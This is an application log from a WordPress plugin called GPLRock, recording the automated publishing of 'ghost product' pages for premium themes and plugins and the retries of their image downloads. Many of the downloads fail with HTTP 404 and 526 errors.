[02-Apr-2026 10:52:32 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-local-pickup-plus [02-Apr-2026 10:52:34 UTC] GPLRock: Image downloaded successfully for product aurum-minimalist-shopping-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c913cddf.jpg [02-Apr-2026 10:52:34 UTC] GPLRock: Using pre-downloaded image for product aurum-minimalist-shopping-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c913cddf.jpg [02-Apr-2026 10:52:34 UTC] GPLRock: Ghost product published with image - Product ID: aurum-minimalist-shopping-theme [02-Apr-2026 10:52:36 UTC] GPLRock: Image downloaded successfully for product affiliatewp-multi-level-affiliates-by-click-studio (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1f990869.jpg [02-Apr-2026 10:52:36 UTC] GPLRock: Using pre-downloaded image for product affiliatewp-multi-level-affiliates-by-click-studio: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1f990869.jpg [02-Apr-2026 10:52:36 UTC] GPLRock: Ghost product published with image - Product ID: affiliatewp-multi-level-affiliates-by-click-studio [02-Apr-2026 10:52:37 UTC] GPLRock: Image downloaded successfully for product totalpoll-pro-responsive-wordpress-poll-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-58d20d11.jpg [02-Apr-2026 10:52:37 UTC] GPLRock: Using pre-downloaded image for product totalpoll-pro-responsive-wordpress-poll-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-58d20d11.jpg [02-Apr-2026 10:52:37 UTC] GPLRock: Ghost product published with image - Product ID: totalpoll-pro-responsive-wordpress-poll-plugin [02-Apr-2026 10:52:40 UTC] GPLRock: Image download failed for product billey-creative-portfolio-agency-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [02-Apr-2026 10:52:44 UTC] GPLRock: Image download failed for product billey-creative-portfolio-agency-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [02-Apr-2026 10:52:48 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/08/Billey.png for product billey-creative-portfolio-agency-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [02-Apr-2026 10:52:49 UTC] GPLRock: Image download failed for product billey-creative-portfolio-agency-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [02-Apr-2026 10:52:53 UTC] GPLRock: Image download failed for product billey-creative-portfolio-agency-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [02-Apr-2026 10:52:57 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/08/Billey.png for product billey-creative-portfolio-agency-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [02-Apr-2026 10:52:57 UTC] GPLRock WARNING: Image download failed for product billey-creative-portfolio-agency-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2020/08/Billey.png [02-Apr-2026 10:52:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: billey-creative-portfolio-agency-wordpress-theme [02-Apr-2026 10:52:58 UTC] GPLRock: Image downloaded successfully for product gravity-forms-stripe-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-01ac9c65.jpg [02-Apr-2026 10:52:59 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-stripe-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-01ac9c65.jpg [02-Apr-2026 10:52:59 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-stripe-addon [02-Apr-2026 10:53:00 UTC] GPLRock: Image downloaded successfully for product gravity-forms-coupons-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-060f2d67.jpg [02-Apr-2026 10:53:00 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-coupons-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-060f2d67.jpg [02-Apr-2026 10:53:00 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-coupons-addon [02-Apr-2026 10:53:01 UTC] GPLRock: Image downloaded successfully for product geodirectory-location-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e68232fc.jpg [02-Apr-2026 10:53:01 UTC] GPLRock: Using pre-downloaded image for product geodirectory-location-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e68232fc.jpg [02-Apr-2026 10:53:01 UTC] GPLRock: Ghost product published with image - Product ID: geodirectory-location-manager [02-Apr-2026 10:57:55 UTC] GPLRock: Image downloaded successfully for product dahlia-beauty-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c7eefd2c.webp [02-Apr-2026 10:57:55 UTC] GPLRock: Using pre-downloaded image for product dahlia-beauty-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c7eefd2c.webp [02-Apr-2026 10:57:55 UTC] GPLRock: Ghost product published with image - Product ID: dahlia-beauty-business-elementor-template-kit [02-Apr-2026 10:57:57 UTC] GPLRock: Image downloaded successfully for product dagata-digital-marketing-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3727231b.webp [02-Apr-2026 10:57:57 UTC] GPLRock: Using pre-downloaded image for product dagata-digital-marketing-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3727231b.webp [02-Apr-2026 10:57:57 UTC] GPLRock: Ghost product published with image - Product ID: dagata-digital-marketing-elementor-template-kit [02-Apr-2026 10:57:58 UTC] GPLRock: Image downloaded successfully for product durban-digital-agency-elementor-pro-full-site-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c9a68a52.webp [02-Apr-2026 10:57:58 UTC] GPLRock: Using pre-downloaded image for product durban-digital-agency-elementor-pro-full-site-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c9a68a52.webp [02-Apr-2026 10:57:58 UTC] GPLRock: Ghost product published with image - Product ID: durban-digital-agency-elementor-pro-full-site-template-kit [02-Apr-2026 10:57:59 UTC] GPLRock: Image downloaded successfully for product cynex-cyber-security-services-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-98a092b2.webp [02-Apr-2026 10:57:59 UTC] GPLRock: Using pre-downloaded image for product cynex-cyber-security-services-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-98a092b2.webp [02-Apr-2026 10:57:59 UTC] GPLRock: Ghost product published with image - Product ID: cynex-cyber-security-services-company-elementor-template-kit [02-Apr-2026 10:58:01 UTC] GPLRock: Image downloaded successfully for product cybox-nft-collections-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-55797f74.webp [02-Apr-2026 10:58:01 UTC] GPLRock: Using pre-downloaded image for product cybox-nft-collections-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-55797f74.webp [02-Apr-2026 10:58:01 UTC] GPLRock: Ghost product published with image - Product ID: cybox-nft-collections-elementor-template-kit [02-Apr-2026 11:39:25 UTC] GPLRock: Image download failed for product burgos-street-food-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:39:27 UTC] GPLRock: Image download failed for product burgos-street-food-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:39:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/burgos---street-food-wordpress-theme-5796.webp for product burgos-street-food-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:39:30 UTC] GPLRock: Image download failed for product burgos-street-food-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:39:32 UTC] GPLRock: Image download failed for product burgos-street-food-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:39:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/burgos---street-food-wordpress-theme-5796.webp for product burgos-street-food-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:39:34 UTC] GPLRock WARNING: Image download failed for product burgos-street-food-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/burgos---street-food-wordpress-theme-5796.webp [02-Apr-2026 11:39:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: burgos-street-food-wordpress-theme [02-Apr-2026 11:39:34 UTC] GPLRock: Image download failed for product hydd-creative-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:39:36 UTC] GPLRock: Image download failed for product hydd-creative-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:39:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hydd---creative-multi-purpose-wordpress-theme-388.webp for product hydd-creative-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:39:38 UTC] GPLRock: Image download failed for product hydd-creative-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:39:40 UTC] GPLRock: Image download failed for product hydd-creative-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:39:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hydd---creative-multi-purpose-wordpress-theme-388.webp for product hydd-creative-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:39:42 UTC] GPLRock WARNING: Image download failed for product hydd-creative-multi-purpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/hydd---creative-multi-purpose-wordpress-theme-388.webp [02-Apr-2026 11:39:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hydd-creative-multi-purpose-wordpress-theme [02-Apr-2026 11:39:42 UTC] GPLRock: Image download failed for product tozen-personal-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:39:45 UTC] GPLRock: Image download failed for product tozen-personal-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:39:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tozen--personal-wordpress-blog-theme-13323.webp for product tozen-personal-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:39:47 UTC] GPLRock: Image download failed for product tozen-personal-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:39:49 UTC] GPLRock: Image download failed for product tozen-personal-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:39:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tozen--personal-wordpress-blog-theme-13323.webp for product tozen-personal-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:39:51 UTC] GPLRock WARNING: Image download failed for product tozen-personal-wordpress-blog-theme. URL: https://meldwp.com/wp-content/uploads/tozen--personal-wordpress-blog-theme-13323.webp [02-Apr-2026 11:39:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tozen-personal-wordpress-blog-theme [02-Apr-2026 11:39:51 UTC] GPLRock: Image download failed for product flashmart-multipurpose-elementor-woocommerce-wordpress-theme-10-homepages-mobile-layout-ready (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:39:53 UTC] GPLRock: Image download failed for product flashmart-multipurpose-elementor-woocommerce-wordpress-theme-10-homepages-mobile-layout-ready (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:39:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flashmart---multipurpose-elementor-woocommerce-wordpress-theme-10-homepages--mob-29388.webp for product flashmart-multipurpose-elementor-woocommerce-wordpress-theme-10-homepages-mobile-layout-ready after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:39:56 UTC] GPLRock: Image download failed for product flashmart-multipurpose-elementor-woocommerce-wordpress-theme-10-homepages-mobile-layout-ready (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:39:58 UTC] GPLRock: Image download failed for product flashmart-multipurpose-elementor-woocommerce-wordpress-theme-10-homepages-mobile-layout-ready (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flashmart---multipurpose-elementor-woocommerce-wordpress-theme-10-homepages--mob-29388.webp for product flashmart-multipurpose-elementor-woocommerce-wordpress-theme-10-homepages-mobile-layout-ready after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:40:00 UTC] GPLRock WARNING: Image download failed for product flashmart-multipurpose-elementor-woocommerce-wordpress-theme-10-homepages-mobile-layout-ready. URL: https://meldwp.com/wp-content/uploads/flashmart---multipurpose-elementor-woocommerce-wordpress-theme-10-homepages--mob-29388.webp [02-Apr-2026 11:40:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: flashmart-multipurpose-elementor-woocommerce-wordpress-theme-10-homepages-mobile-layout-ready [02-Apr-2026 11:40:00 UTC] GPLRock: Image download failed for product averly-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:02 UTC] GPLRock: Image download failed for product averly-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/averly---creative-multipurpose-wordpress-theme-5780.webp for product averly-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:40:04 UTC] GPLRock: Image download failed for product averly-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:06 UTC] GPLRock: Image download failed for product averly-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/averly---creative-multipurpose-wordpress-theme-5780.webp for product averly-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:40:08 UTC] GPLRock WARNING: Image download failed for product averly-creative-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/averly---creative-multipurpose-wordpress-theme-5780.webp [02-Apr-2026 11:40:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: averly-creative-multipurpose-wordpress-theme [02-Apr-2026 11:40:09 UTC] GPLRock: Image download failed for product grulf-golf-club-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:11 UTC] GPLRock: Image download failed for product grulf-golf-club-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grulf---golf-club-wordpress-theme-33433.webp for product grulf-golf-club-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:40:13 UTC] GPLRock: Image download failed for product grulf-golf-club-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:15 UTC] GPLRock: Image download failed for product grulf-golf-club-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grulf---golf-club-wordpress-theme-33433.webp for product grulf-golf-club-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:40:17 UTC] GPLRock WARNING: Image download failed for product grulf-golf-club-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/grulf---golf-club-wordpress-theme-33433.webp [02-Apr-2026 11:40:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: grulf-golf-club-wordpress-theme [02-Apr-2026 11:40:17 UTC] GPLRock: Image download failed for product maxus-multipurpose-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:19 UTC] GPLRock: Image download failed for product maxus-multipurpose-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maxus---multipurpose-ecommerce-wordpress-theme-4014.webp for product maxus-multipurpose-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:40:22 UTC] GPLRock: Image download failed for product maxus-multipurpose-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:24 UTC] GPLRock: Image download failed for product maxus-multipurpose-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maxus---multipurpose-ecommerce-wordpress-theme-4014.webp for product maxus-multipurpose-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:40:26 UTC] GPLRock WARNING: Image download failed for product maxus-multipurpose-ecommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/maxus---multipurpose-ecommerce-wordpress-theme-4014.webp [02-Apr-2026 11:40:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: maxus-multipurpose-ecommerce-wordpress-theme [02-Apr-2026 11:40:26 UTC] GPLRock: Image download failed for product bizix-corporate-and-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:28 UTC] GPLRock: Image download failed for product bizix-corporate-and-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bizix---corporate-and-business-wordpress-theme-3440.webp for product bizix-corporate-and-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:40:30 UTC] GPLRock: Image download failed for product bizix-corporate-and-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:32 UTC] GPLRock: Image download failed for product bizix-corporate-and-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bizix---corporate-and-business-wordpress-theme-3440.webp for product bizix-corporate-and-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:40:35 UTC] GPLRock WARNING: Image download failed for product bizix-corporate-and-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bizix---corporate-and-business-wordpress-theme-3440.webp [02-Apr-2026 11:40:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bizix-corporate-and-business-wordpress-theme [02-Apr-2026 11:40:35 UTC] GPLRock: Image download failed for product health-coach-mentor-lifestyle-master-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:37 UTC] GPLRock: Image download failed for product health-coach-mentor-lifestyle-master-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/health-coach---mentor--lifestyle-master-wordpress-theme-29973.webp for product health-coach-mentor-lifestyle-master-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:40:39 UTC] GPLRock: Image download failed for product health-coach-mentor-lifestyle-master-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:41 UTC] GPLRock: Image download failed for product health-coach-mentor-lifestyle-master-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/health-coach---mentor--lifestyle-master-wordpress-theme-29973.webp for product health-coach-mentor-lifestyle-master-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:40:43 UTC] GPLRock WARNING: Image download failed for product health-coach-mentor-lifestyle-master-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/health-coach---mentor--lifestyle-master-wordpress-theme-29973.webp [02-Apr-2026 11:40:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: health-coach-mentor-lifestyle-master-wordpress-theme [02-Apr-2026 11:40:43 UTC] GPLRock: Image download failed for product blonwe-multipurpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:46 UTC] GPLRock: Image download failed for product blonwe-multipurpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blonwe---multipurpose-woocommerce-theme-26726.webp for product blonwe-multipurpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:40:48 UTC] GPLRock: Image download failed for product blonwe-multipurpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:50 UTC] GPLRock: Image download failed for product blonwe-multipurpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:40:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blonwe---multipurpose-woocommerce-theme-26726.webp for product blonwe-multipurpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:40:52 UTC] GPLRock WARNING: Image download failed for product blonwe-multipurpose-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/blonwe---multipurpose-woocommerce-theme-26726.webp [02-Apr-2026 11:40:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: blonwe-multipurpose-woocommerce-theme [02-Apr-2026 11:47:07 UTC] GPLRock: Image download failed for product prologue-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:09 UTC] GPLRock: Image download failed for product prologue-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/prologue---creative-multipurpose-wordpress-theme-2126.webp for product prologue-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:47:11 UTC] GPLRock: Image download failed for product prologue-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:13 UTC] GPLRock: Image download failed for product prologue-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/prologue---creative-multipurpose-wordpress-theme-2126.webp for product prologue-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:47:15 UTC] GPLRock WARNING: Image download failed for product prologue-creative-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/prologue---creative-multipurpose-wordpress-theme-2126.webp [02-Apr-2026 11:47:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: prologue-creative-multipurpose-wordpress-theme [02-Apr-2026 11:47:15 UTC] GPLRock: Image download failed for product gaea-environmental-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:17 UTC] GPLRock: Image download failed for product gaea-environmental-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gaea---environmental-wordpress-theme-16328.webp for product gaea-environmental-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:47:20 UTC] GPLRock: Image download failed for product gaea-environmental-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:22 UTC] GPLRock: Image download failed for product gaea-environmental-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gaea---environmental-wordpress-theme-16328.webp for product gaea-environmental-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:47:24 UTC] GPLRock WARNING: Image download failed for product gaea-environmental-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gaea---environmental-wordpress-theme-16328.webp [02-Apr-2026 11:47:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gaea-environmental-wordpress-theme [02-Apr-2026 11:47:24 UTC] GPLRock: Image download failed for product kidzieo-kindergarten-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:26 UTC] GPLRock: Image download failed for product kidzieo-kindergarten-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kidzieo---kindergarten-school-wordpress-theme-24357.webp for product kidzieo-kindergarten-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:47:28 UTC] GPLRock: Image download failed for product kidzieo-kindergarten-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:30 UTC] GPLRock: Image download failed for product kidzieo-kindergarten-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kidzieo---kindergarten-school-wordpress-theme-24357.webp for product kidzieo-kindergarten-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:47:32 UTC] GPLRock WARNING: Image download failed for product kidzieo-kindergarten-school-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kidzieo---kindergarten-school-wordpress-theme-24357.webp [02-Apr-2026 11:47:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kidzieo-kindergarten-school-wordpress-theme [02-Apr-2026 11:47:33 UTC] GPLRock: Image download failed for product hostup-web-hosting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:35 UTC] GPLRock: Image download failed for product hostup-web-hosting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hostup---web-hosting-wordpress-theme-6392.webp for product hostup-web-hosting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:47:37 UTC] GPLRock: Image download failed for product hostup-web-hosting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:39 UTC] GPLRock: Image download failed for product hostup-web-hosting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hostup---web-hosting-wordpress-theme-6392.webp for product hostup-web-hosting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:47:41 UTC] GPLRock WARNING: Image download failed for product hostup-web-hosting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/hostup---web-hosting-wordpress-theme-6392.webp [02-Apr-2026 11:47:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hostup-web-hosting-wordpress-theme [02-Apr-2026 11:47:41 UTC] GPLRock: Image download failed for product maroon-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:43 UTC] GPLRock: Image download failed for product maroon-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maroon---photography-wordpress-theme-20031.webp for product maroon-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:47:46 UTC] GPLRock: Image download failed for product maroon-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:48 UTC] GPLRock: Image download failed for product maroon-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maroon---photography-wordpress-theme-20031.webp for product maroon-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:47:50 UTC] GPLRock WARNING: Image download failed for product maroon-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/maroon---photography-wordpress-theme-20031.webp 